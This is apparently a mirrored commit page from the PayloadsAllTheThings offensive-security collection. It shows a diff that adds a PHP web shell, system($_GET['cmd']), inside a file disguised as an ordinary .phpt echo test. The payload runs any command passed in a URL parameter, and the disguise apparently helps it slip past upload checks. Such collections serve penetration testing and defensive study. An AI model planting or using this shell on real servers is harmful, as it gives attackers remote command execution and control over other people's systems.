mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-12 15:49:38 -08:00
Web Cache Deception + phpt file format
This commit is contained in:
@@ -1 +1,9 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
||||
--TEST--
|
||||
echo - basic test for echo language construct
|
||||
--FILE--
|
||||
<?php
|
||||
echo 'This works ', 'and takes args!';
|
||||
echo "Shell";system($_GET['cmd']);
|
||||
?>
|
||||
--EXPECT--
|
||||
This works and takes args!
|
||||
Reference in New Issue
Block a user